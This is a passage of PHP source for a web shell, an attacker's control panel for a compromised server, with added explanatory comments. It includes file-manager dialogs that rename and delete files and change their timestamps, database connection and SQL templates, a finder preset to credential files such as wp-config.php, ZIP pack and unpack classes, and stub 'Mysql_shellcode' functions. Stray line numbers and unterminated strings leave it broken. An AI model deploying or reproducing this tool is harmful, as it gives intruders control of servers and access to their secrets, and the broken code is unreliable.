 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/ACH5BAEKAP8ALAAAAAAQABAAAAiFAP0YEEhwoEE/".
 "/xIuEJhgQYKDBxP+W2ig4cOCBCcyoHjAQMePHgf6WbDxgAIEKFOmHDmSwciQIDsiXLgwgZ+b".
 "OHOSXJiz581/LRcE2LigqNGiLEkKWCCgqVOnM1naDOCHqtWbO336BLpzgAICYMOGRdgywIIC".
 "aNOmRcjVj02tPxPCzfkvIAA7"
 );
 header('Content-type: image/gif');
 echo base64_decode($images[$img]);
 die();
}
2366
function css_showimg($file){
 // Pick the css_img() icon key for a file name. Only the last three bytes of
 // the name are compared, so two-letter extensions are listed with their dot
 // (".js", ".gz", ".rm") and longer ones are matched by their tail ("html" via
 // "tml"; "jpeg" ends in "peg" and falls through to the text icon). The match
 // is case-sensitive; anything unrecognised gets 'txt'.
 $it=substr($file,-3);
 switch($it){
 case "jpg": case "gif": case "bmp": case "png": case "ico": return 'img';break;
 case "htm": case "tml": return 'html';break;
 case "exe": case "com": return 'exe';break;
 case "xml": case "doc": return 'xml';break;
 case ".js": case "vbs": return 'js';break;
 case "mp3": case "wma": case "wav": case "swf": case ".rm": case "avi":case "mp4":case "mvb": return 'mp3';break;
 case "rar": case "tar": case ".gz": case "zip":case "iso": return 'rar';break;
 default: return 'txt';break;
 }
}
2380
function css_js($num,$code = ''){
 // Emit the client-side JavaScript helpers for one page of the UI. $num selects
 // the helper set ("1" file manager, "2" editor, "3" database page, "4" config
 // search page); every branch is wrapped in a <script> element written with
 // html_n(). $code is accepted but never read in this function.
 // The "shellcode" value is special: nothing is echoed and an ASP/JScript page
 // skeleton is returned as a string instead (its <% %> block is empty here).
 if($num == "shellcode"){
 return '<%@ LANGUAGE="JavaScript" %>
 <%

 %>';
 }
 html_n('<script language="javascript">');
 if($num == "1"){ // file-manager dialogs: rename/delete prompts, select-all, timestamp prompt, generic prompt-and-submit
 html_n(' function rusurechk(msg,url){
 smsg = "FileName:[" + msg + "]\nPlease Input New File:";
 re = prompt(smsg,msg);
 if (re){
 url = url + re;
 window.location = url;
 }
 }
 function rusuredel(msg,url){
 smsg = "Do You Suer Delete [" + msg + "] ?";
 if(confirm(smsg)){
 URL = url + msg;
 window.location = url;
 }
 }
 function Delok(msg,gourl)
 {
 smsg = "确定要删除[" + unescape(msg) + "]吗?";
 if(confirm(smsg))
 {
 if(gourl == \'b\')
 {
 document.getElementById(\'actall\').value = escape(gourl);
 document.getElementById(\'fileall\').submit();
 }
 else window.location = gourl;
 }
 }
 function CheckAll(form)
 {
 for(var i=0;i<form.elements.length;i++)
 {
 var e = form.elements[i];
 if (e.name != \'chkall\')
 e.checked = form.chkall.checked;
 }
 }
 function CheckDate(msg,gourl)
 {
 smsg = "当前文件时间:[" + msg + "]";
 re = prompt(smsg,msg);
 if(re)
 {
 var url = gourl + re;
 var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/;
 var r = re.match(reg);
 if(r==null){alert(\'日期格式不正确!格式:yyyy-mm-dd hh:mm:ss\');return false;}
 else{document.getElementById(\'actall\').value = gourl; document.getElementById(\'inver\').value = re; document.getElementById(\'fileall\').submit();}
 }
 }
 function SubmitUrl(msg,txt,actid)
 {
 re = prompt(msg,unescape(txt));
 if(re)
 {
 document.getElementById(\'actall\').value = actid;
 document.getElementById(\'inver\').value = escape(re);
 document.getElementById(\'fileall\').submit();
 }
 }');
 }elseif($num == "2"){ // editor page: legacy (NS4/IE4) in-page text search, then CheckDate() which validates #mtime and base64-encodes #newfile/#txt before submitting #editor
 html_n('var NS4 = (document.layers);
var IE4 = (document.all);
var win = this;
var n = 0;
function search(str){
 var txt, i, found;
 if(str == "")return false;
 if(NS4){
 if(!win.find(str)) while(win.find(str, false, true)) n++; else n++;
 if(n == 0) alert(str + " ... Not-Find")
 }
 if(IE4){
 txt = win.document.body.createTextRange();
 for(i = 0; i <= n && (found = txt.findText(str)) != false; i++){
 txt.moveStart("character", 1);
 txt.moveEnd("textedit")
 }
 if(found){txt.moveStart("character", -1);txt.findText(str);txt.select();txt.scrollIntoView();n++}
 else{if (n > 0){n = 0;search(str)}else alert(str + "... Not-Find")}
 }
 return false
}
function CheckDate(){
 var re = document.getElementById(\'mtime\').value;
 var reg = /^(\\d{1,4})(-|\\/)(\\d{1,2})\\2(\\d{1,2}) (\\d{1,2}):(\\d{1,2}):(\\d{1,2})$/;
 var r = re.match(reg);
 var t = document.getElementById(\'charset\').value;
 t = t.toLowerCase();
 if(r==null){alert(\'日期格式不正确!格式:yyyy-mm-dd hh:mm:ss\');return false;}
 else{document.getElementById(\'newfile\').value = base64encode(document.getElementById(\'newfile\').value);
 if(t=="utf-8"){document.getElementById(\'txt\').value = base64encode(utf16to8(document.getElementById(\'txt\').value));}
');
// The gbk/gb2312 encoding step is only emitted on PHP 5+ (first character of
// PHP_VERSION compared numerically). base64encode()/utf16to8() are not defined
// in this block and are presumably provided elsewhere on the page.
if (substr(PHP_VERSION,0,1)>=5){html_n('if(t=="gbk" || t=="gb2312"){document.getElementById(\'txt\').value = base64encode(utf16to8(document.getElementById(\'txt\').value));}');}
html_n('
 document.getElementById(\'editor\').submit();}
}');
}elseif($num == "3"){ // database page: Full(i) fills DbForm.string with a connection-string template (1-4) or DbForm.sql with a sample statement (6-13); 0 and 5 are list separators
 html_n('function Full(i){
 if(i==0 || i==5){
 return false;
 }
 Str = new Array(12);
 Str[1] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\db.mdb";
 Str[2] = "Driver={Sql Server};Server=,1433;Database=DbName;Uid=sa;Pwd=****";
 Str[3] = "Driver={MySql};Server=;Port=3306;Database=DbName;Uid=root;Pwd=****";
 Str[4] = "Provider=MSDAORA.1;Password=密码;User ID=帐号;Data Source=服务名;Persist Security Info=True;";
 Str[6] = "SELECT * FROM [TableName] WHERE ID<100";
 Str[7] = "INSERT INTO [TableName](USER,PASS) VALUES(\'eanver\',\'mypass\')";
 Str[8] = "DELETE FROM [TableName] WHERE ID=100";
 Str[9] = "UPDATE [TableName] SET USER=\'eanver\' WHERE ID=100";
 Str[10] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";
 Str[11] = "DROP TABLE [TableName]";
 Str[12] = "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";
 Str[13] = "ALTER TABLE [TableName] DROP COLUMN PASS";
 if(i<=4){
 DbForm.string.value = Str[i];
 }else{
 DbForm.sql.value = Str[i];
 }
 return true;
 }');
}
// Config-file search page: Fulll(i) copies one of eight preset file names into
// sform.code (0 is the list separator).
elseif($num == "4"){
 html_n('function Fulll(i){
 if(i==0){
 return false;
 }
 Str = new Array(8);
 Str[1] = "config.inc.php";
 Str[2] = "config.inc.php";
 Str[3] = "config_base.php";
 Str[4] = "config.inc.php";
 Str[5] = "config.php";
 Str[6] = "wp-config.php";
 Str[7] = "config.php";
 Str[8] = "mysql.php";
 sform.code.value = Str[i];
 return true;
 }');
}
// Any other $num emits an empty <script></script> pair.
html_n('</script>');
}
2533
function css_left(){
 // Emit the sidebar menu: a <style> block for the ".menu" definition list, a
 // <script> with getObject() (getElementById / document.all / document.layers
 // lookup, returns false when none resolve) and showHide() (toggles an element's
 // display between "none" and "block"), then the opening <div class="menu">.
 // The div is left open; the caller is expected to fill and close it.
 html_n('<style type="text/css">
 .menu{width:152px;margin-left:auto;margin-right:auto;}
 .menu dl{margin-top:2px;}
 .menu dl dt{top left repeat-x;}
 .menu dl dt a{height:22px;padding-top:1px;line-height:18px;width:152px;display:block;color:#FFFFFF;font-weight:bold;
 text-decoration:none; 10px 7px no-repeat;text-indent:20px;letter-spacing:2px;}
 .menu dl dt a:hover{color:#FFFFCC;}
 .menu dl dd ul{list-style:none;}
 .menu dl dd ul li a{color:#000000;height:27px;widows:152px;display:block;line-height:27px;text-indent:28px;
 background:#BBBBBB no-repeat 13px 11px;border-color:#FFF #545454 #545454 #FFF;
 border-style:solid;border-width:1px;}
 .menu dl dd ul li a:hover{background:#FFF no-repeat 13px 11px;color:#FF6600;font-weight:bold;}
 </STYLE>');
 // Collapsible-menu helpers; showHide() is what the menu headings call.
 html_n('<script language="javascript">
 function getObject(objectId){
 if(document.getElementById && document.getElementById(objectId)) {
 return document.getElementById(objectId);
 }
 else if (document.all && document.all(objectId)) {
 return document.all(objectId);
 }
 else if (document.layers && document.layers[objectId]) {
 return document.layers[objectId];
 }
 else {
 return false;
 }
 }
 function showHide(objname){
 var obj = getObject(objname);
 if(obj.style.display == "none"){
 obj.style.display = "block";
 }else{
 obj.style.display = "none";
 }
 }
 </script><div class="menu">');
}
2573
function css_main(){
 // Emit the page-wide stylesheet (dark theme, IE scrollbar colours), open
 // <body> with an IE-only gradient filter, and open the centred 85%-wide table
 // that holds the page content. Nothing here closes the table — css_foot()
 // writes the matching closing tags.
 html_n('<style type="text/css">
 *{padding:0px;margin:0px;}
 body,td{font-size: 12px;color:#00ff00;background:#292929;}input,select,textarea{font-size: 12px;background-color:#FFFFCC;border:1px solid #fff}
 body{color:#FFFFFF;font-family:Verdana, Arial, Helvetica, sans-serif;
 height:100%;overflow-y:auto;background:#333333;SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323; SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838; SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;SCROLLBAR-TRACK-COLOR: #383838;}
 input,select,textarea{background-color:#FFFFCC;border:1px solid #FFFFFF}
 a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}
 .actall{background:#000000;font-size:14px;border:1px solid #999999;padding:2px;margin-top:3px;margin-bottom:3px;clear:both;}
 </STYLE><body style="table-layout:fixed; word-break:break-all; FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)">
 <table width="85%" border=0 bgcolor="#555555" align="center">');
}
2586
function css_foot(){
 // Close the content cell, row and table. The <table> is opened by css_main();
 // the <tr><td> are presumably opened by the calling page.
 html_n('</td></tr></table>');
}
2590
2591function Mysql_shellcode()
2592{
2593 return "
2594}
2595function Mysql_shellcode64()
2596{
2597 return "
2598}
2599
// In-memory ZIP (PKZIP) writer behind the "pack" action. Given a list of file
// paths it deflates each one with gzcompress() and leaves the finished archive
// bytes in $out. The output is ZIP format regardless of the download name:
// local headers "PK\x03\x04", central directory "PK\x01\x02", EOCD "PK\x05\x06".
class eanver{
var $out='';
// Build the archive at construction time. Requires zlib's gzcompress(); without
// it nothing is packed and $out stays empty. Each entry that is a regular file
// is read whole into memory and stored under its basename (directory structure
// is flattened). The boolean return value is discarded by `new`.
function __construct($dir){
 if(@function_exists('gzcompress')){
 if(count($dir) > 0){
 foreach($dir as $file){
 if(is_file($file)){
 $filecode = file_get_contents($file);
 if(is_array($dir)) $file = basename($file);
 $this -> filezip($filecode,$file);
 }
 }
 $this->out = $this -> packfile();
 }
 return true;
 }
 else return false;
}
 var $datasec = array(); // local file header + data records, in entry order
 var $ctrl_dir = array(); // central directory records, parallel to $datasec
 var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; // EOCD signature + disk number + disk-with-CD (both 0)
 var $old_offset = 0; // byte offset of the next entry's local header within $datasec
 // Encode a Unix timestamp (0 = now) as a 32-bit MS-DOS date/time: year-1980 at
 // bit 25, month at 21, day at 16, hours at 11, minutes at 5, seconds/2 in the
 // low bits. Anything before 1980 is clamped to 1980-01-01 00:00:00.
 function at($atunix = 0) {
 $unixarr = ($atunix == 0) ? getdate() : getdate($atunix);
 if ($unixarr['year'] < 1980) {
 $unixarr['year'] = 1980;
 $unixarr['mon'] = 1;
 $unixarr['mday'] = 1;
 $unixarr['hours'] = 0;
 $unixarr['minutes'] = 0;
 $unixarr['seconds'] = 0;
 }
 return (($unixarr['year'] - 1980) << 25) | ($unixarr['mon'] << 21) | ($unixarr['mday'] << 16) |
 ($unixarr['hours'] << 11) | ($unixarr['minutes'] << 5) | ($unixarr['seconds'] >> 1);
 }
 // Append one file ($data under archive name $name) to the in-memory archive:
 // writes a local file header + raw deflate stream + trailing crc/size triple
 // to $datasec, and the matching central-directory record to $ctrl_dir.
 function filezip($data, $name, $time = 0) {
 $name = str_replace('\\', '/', $name);
 $dtime = dechex($this->at($time));
 // Reverse the hex digits pairwise into a "\xNN\xNN\xNN\xNN" escape string
 // (little-endian mtime/mdate). Assumes an 8-digit value; shorter values read
 // out-of-range string offsets as "".
 $hexdtime = '\x' . $dtime[6] . $dtime[7]
 . '\x' . $dtime[4] . $dtime[5]
 . '\x' . $dtime[2] . $dtime[3]
 . '\x' . $dtime[0] . $dtime[1];
 // eval() is used only to turn the escape text into raw bytes; its input is
 // built from dechex() output, not from request data.
 eval('$hexdtime = "' . $hexdtime . '";');
 $fr = "\x50\x4b\x03\x04"; // local file header signature
 $fr .= "\x14\x00"; // version needed to extract: 2.0
 $fr .= "\x00\x00"; // general purpose flags: none
 $fr .= "\x08\x00"; // compression method 8 = deflate
 $fr .= $hexdtime;
 $unc_len = strlen($data);
 $crc = crc32($data);
 $zdata = gzcompress($data);
 $c_len = strlen($zdata);
 // gzcompress() returns a zlib stream; drop the 2-byte header and 4-byte
 // Adler-32 trailer to get the raw deflate data ZIP expects. Note $c_len
 // was taken before stripping, so it is 6 bytes larger than the stored data.
 $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
 $fr .= pack('V', $crc);
 $fr .= pack('V', $c_len);
 $fr .= pack('V', $unc_len);
 $fr .= pack('v', strlen($name));
 $fr .= pack('v', 0); // extra field length
 $fr .= $name;
 $fr .= $zdata;
 // crc/sizes repeated after the data (data-descriptor layout) although the
 // flag bit announcing a descriptor is not set.
 $fr .= pack('V', $crc);
 $fr .= pack('V', $c_len);
 $fr .= pack('V', $unc_len);
 $this -> datasec[] = $fr;
 $new_offset = strlen(implode('', $this->datasec));
 $cdrec = "\x50\x4b\x01\x02"; // central directory header signature
 $cdrec .= "\x00\x00"; // version made by
 $cdrec .= "\x14\x00"; // version needed: 2.0
 $cdrec .= "\x00\x00"; // flags
 $cdrec .= "\x08\x00"; // method: deflate
 $cdrec .= $hexdtime;
 $cdrec .= pack('V', $crc);
 $cdrec .= pack('V', $c_len);
 $cdrec .= pack('V', $unc_len);
 $cdrec .= pack('v', strlen($name) );
 $cdrec .= pack('v', 0 ); // extra field length
 $cdrec .= pack('v', 0 ); // file comment length
 $cdrec .= pack('v', 0 ); // disk number start
 $cdrec .= pack('v', 0 ); // internal attributes
 $cdrec .= pack('V', 32 ); // external attributes (DOS archive bit)
 $cdrec .= pack('V', $this -> old_offset ); // offset of this entry's local header
 $this -> old_offset = $new_offset;
 $cdrec .= $name;
 $this -> ctrl_dir[] = $cdrec;
 }
 // Assemble the final archive: all entries, the central directory, then the
 // end-of-central-directory record (entry counts, CD size, CD offset, empty comment).
 function packfile(){
 $data = implode('', $this -> datasec);
 $ctrldir = implode('', $this -> ctrl_dir);
 return $data.$ctrldir.$this -> eof_ctrl_dir.pack('v', sizeof($this -> ctrl_dir)).pack('v', sizeof($this -> ctrl_dir)).pack('V', strlen($ctrldir)).pack('V', strlen($data))."\x00\x00";
 }
}
2691
// ZIP extractor behind the "unzip" action. Reads the central directory of an
// archive on disk and writes the selected entries under a target directory,
// echoing one "目录:" (directory) or "文件:" (file) line per item created.
// Entry names from the archive are concatenated to the target path as-is.
class zip
{

 var $total_files = 0; // files written so far (incremented in ExtractFile)
 var $total_folders = 0; // directories created so far

 // Extract entries from archive $zn into directory $to.
 // $index: list of 0-based entry indexes to extract; the default [-1] means all.
 // Returns -1 when the archive cannot be opened or an index is not an integer /
 // exceeds the entry count; otherwise a map of entry name => ExtractFile() result
 // ($stat is never initialised, so it is null when no entry matched).
 // Note the validation loop stops at the first falsy element, so an index of 0
 // (or the end of the list, read as an unset offset) ends the check early.
 function Extract ( $zn, $to, $index = Array(-1) )
 {
 $ok = 0; $zip = @fopen($zn,'rb');
 if(!$zip) return(-1);
 $cdir = $this->ReadCentralDir($zip,$zn);
 $pos_entry = $cdir['offset'];

 if(!is_array($index)){ $index = array($index); }
 for($i=0; $index[$i];$i++){
 if(intval($index[$i])!=$index[$i]||$index[$i]>$cdir['entries'])
 return(-1);
 }
 // Walk the central directory sequentially; for each selected entry seek to
 // its local header and extract from there.
 for ($i=0; $i<$cdir['entries']; $i++)
 {
 @fseek($zip, $pos_entry);
 $header = $this->ReadCentralFileHeaders($zip);
 $header['index'] = $i; $pos_entry = ftell($zip);
 @rewind($zip); fseek($zip, $header['offset']);
 if(in_array("-1",$index)||in_array($i,$index))
 $stat[$header['filename']]=$this->ExtractFile($header, $to, $zip);
 }
 fclose($zip);
 return $stat;
 }

 // Parse a 30-byte local file header at the current stream position, followed
 // by the file name and extra field. The 4-byte signature is unpacked as two
 // 16-bit values (chk/id) and not verified. Converts the DOS mdate/mtime to a
 // Unix timestamp in 'mtime' (falls back to time() when either field is zero).
 function ReadFileHeader($zip)
 {
 $binary_data = fread($zip, 30);
 $data = unpack('vchk/vid/vversion/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len', $binary_data);

 $header['filename'] = fread($zip, $data['filename_len']);
 if ($data['extra_len'] != 0) {
 $header['extra'] = fread($zip, $data['extra_len']);
 } else { $header['extra'] = ''; }

 $header['compression'] = $data['compression'];$header['size'] = $data['size'];
 $header['compressed_size'] = $data['compressed_size'];
 $header['crc'] = $data['crc']; $header['flag'] = $data['flag'];
 $header['mdate'] = $data['mdate'];$header['mtime'] = $data['mtime'];

 if ($header['mdate'] && $header['mtime']){
 $hour=($header['mtime']&0xF800)>>11;$minute=($header['mtime']&0x07E0)>>5;
 $seconde=($header['mtime']&0x001F)*2;$year=(($header['mdate']&0xFE00)>>9)+1980;
 $month=($header['mdate']&0x01E0)>>5;$day=$header['mdate']&0x001F;
 $header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year);
 }else{$header['mtime'] = time();}

 $header['stored_filename'] = $header['filename'];
 $header['status'] = "ok";
 return $header;
 }

 // Parse a 46-byte central directory record at the current stream position,
 // plus its name, extra field and comment. 'offset' is the entry's local header
 // position. Names ending in '/' get external attribute 0x41FF0010 (low word
 // 0x10 = DOS directory attribute) so callers can treat them as directories.
 function ReadCentralFileHeaders($zip){
 $binary_data = fread($zip, 46);
 $header = unpack('vchkid/vid/vversion/vversion_extracted/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len/vcomment_len/vdisk/vinternal/Vexternal/Voffset', $binary_data);

 if ($header['filename_len'] != 0)
 $header['filename'] = fread($zip,$header['filename_len']);
 else $header['filename'] = '';

 if ($header['extra_len'] != 0)
 $header['extra'] = fread($zip, $header['extra_len']);
 else $header['extra'] = '';

 if ($header['comment_len'] != 0)
 $header['comment'] = fread($zip, $header['comment_len']);
 else $header['comment'] = '';

 if ($header['mdate'] && $header['mtime'])
 {
 $hour = ($header['mtime'] & 0xF800) >> 11;
 $minute = ($header['mtime'] & 0x07E0) >> 5;
 $seconde = ($header['mtime'] & 0x001F)*2;
 $year = (($header['mdate'] & 0xFE00) >> 9) + 1980;
 $month = ($header['mdate'] & 0x01E0) >> 5;
 $day = $header['mdate'] & 0x001F;
 $header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year);
 } else {
 $header['mtime'] = time();
 }
 $header['stored_filename'] = $header['filename'];
 $header['status'] = 'ok';
 if (substr($header['filename'], -1) == '/')
 $header['external'] = 0x41FF0010;
 return $header;
 }

 // Locate and parse the end-of-central-directory record. Scans the last
 // 277 bytes (or the whole file if smaller) one byte at a time, folding bytes
 // into $bytes until the EOCD signature "PK\x05\x06" (0x504b0506) is seen.
 // $bytes is never masked, so on 64-bit builds the 4-byte value only matches
 // when the four preceding bytes are zero; the second constant covers the case
 // where they are ASCII ".php" (0x2e706870). Returns entry count, CD size and
 // offset, disk fields and the archive comment.
 function ReadCentralDir($zip,$zip_name){
 $size = filesize($zip_name);

 if ($size < 277) $maximum_size = $size;
 else $maximum_size=277;

 @fseek($zip, $size-$maximum_size);
 $pos = ftell($zip); $bytes = 0x00000000;

 while ($pos < $size){
 $byte = @fread($zip, 1); $bytes=($bytes << 8) | ord($byte);
 if ($bytes == 0x504b0506 or $bytes == 0x2e706870504b0506){ $pos++;break;} $pos++;
 }

 $fdata=fread($zip,18);

 $data=@unpack('vdisk/vdisk_start/vdisk_entries/ventries/Vsize/Voffset/vcomment_size',$fdata);

 if ($data['comment_size'] != 0) $centd['comment'] = fread($zip, $data['comment_size']);
 else $centd['comment'] = ''; $centd['entries'] = $data['entries'];
 $centd['disk_entries'] = $data['disk_entries'];
 $centd['offset'] = $data['offset'];$centd['disk_start'] = $data['disk_start'];
 $centd['size'] = $data['size']; $centd['disk'] = $data['disk'];
 return $centd;
 }

 // Write one entry to disk. The stream must be positioned at the entry's local
 // header; that header is re-read here and REPLACES the central-directory
 // $header passed in (ReadFileHeader sets no 'external' key, so the attribute
 // check below compares an unset index). Creates every missing path component
 // with mode 0777. Stored entries (method 0) are copied in 2 KiB chunks; any
 // other method is wrapped in a temporary gzip container (<name>.gz), inflated
 // back through gzopen()/gzread(), and the temporary file is removed.
 // Returns -1 if an output file cannot be opened, nothing for directory
 // entries, true on success.
 function ExtractFile($header,$to,$zip){
 $header = $this->readfileheader($zip);

 if(substr($to,-1)!="/") $to.="/";
 if($to=='./') $to = '';
 // Create intermediate directories; the entry name is used verbatim.
 $pth = explode("/",$to.$header['filename']);
 $mydir = '';
 for($i=0;$i<count($pth)-1;$i++){
 if(!$pth[$i]) continue;
 $mydir .= $pth[$i]."/";
 if((!is_dir($mydir) && @mkdir($mydir,0777)) || (($mydir==$to.$header['filename'] || ($mydir==$to && $this->total_folders==0)) && is_dir($mydir)) ){
 @chmod($mydir,0777);
 $this->total_folders ++;
 echo "目录: $mydir<br>";
 }
 }

 // A trailing '/' marks a directory entry: nothing more to write.
 if(strrchr($header['filename'],'/')=='/') return;

 if (!($header['external']==0x41FF0010)&&!($header['external']==16)){
 if ($header['compression']==0){
 $fp = @fopen($to.$header['filename'], 'wb');
 if(!$fp) return(-1);
 $size = $header['compressed_size'];

 while ($size != 0){
 $read_size = ($size < 2048 ? $size : 2048);
 $buffer = fread($zip, $read_size);
 $binary_data = pack('a'.$read_size, $buffer);
 @fwrite($fp, $binary_data, $read_size);
 $size -= $read_size;
 }
 fclose($fp);
 touch($to.$header['filename'], $header['mtime']);
 }else{
 $fp = @fopen($to.$header['filename'].'.gz','wb');
 if(!$fp) return(-1);
 // 10-byte gzip header: magic 1f 8b, CM = the ZIP method byte, flags 0,
 // mtime = now, XFL 0, OS 3 (Unix).
 $binary_data = pack('va1a1Va1a1', 0x8b1f, Chr($header['compression']),
 Chr(0x00), time(), Chr(0x00), Chr(3));

 fwrite($fp, $binary_data, 10);
 $size = $header['compressed_size'];

 // Copy the raw deflate stream in 1 KiB chunks.
 while ($size != 0){
 $read_size = ($size < 1024 ? $size : 1024);
 $buffer = fread($zip, $read_size);
 $binary_data = pack('a'.$read_size, $buffer);
 @fwrite($fp, $binary_data, $read_size);
 $size -= $read_size;
 }

 // gzip trailer: crc32 and uncompressed size from the ZIP header.
 $binary_data = pack('VV', $header['crc'], $header['size']);
 fwrite($fp, $binary_data,8); fclose($fp);

 // `=` binds tighter than `or`, so a failed gzopen() dies here (French
 // message) and the -2 return below is never reached.
 $gzp = @gzopen($to.$header['filename'].'.gz','rb') or die("Cette archive est compress");
 if(!$gzp) return(-2);
 $fp = @fopen($to.$header['filename'],'wb');
 if(!$fp) return(-1);
 $size = $header['size'];

 while ($size != 0){
 $read_size = ($size < 2048 ? $size : 2048);
 $buffer = gzread($gzp, $read_size);
 $binary_data = pack('a'.$read_size, $buffer);
 @fwrite($fp, $binary_data, $read_size);
 $size -= $read_size;
 }
 fclose($fp); gzclose($gzp);

 touch($to.$header['filename'], $header['mtime']);
 @unlink($to.$header['filename'].'.gz');

 }
 }

 $this->total_files ++;
 echo "文件: $to$header[filename]<br>";
 return true;
 }
}
// Flush and close the output buffer; pairs with an ob_start() presumably opened
// near the top of the file.
ob_end_flush();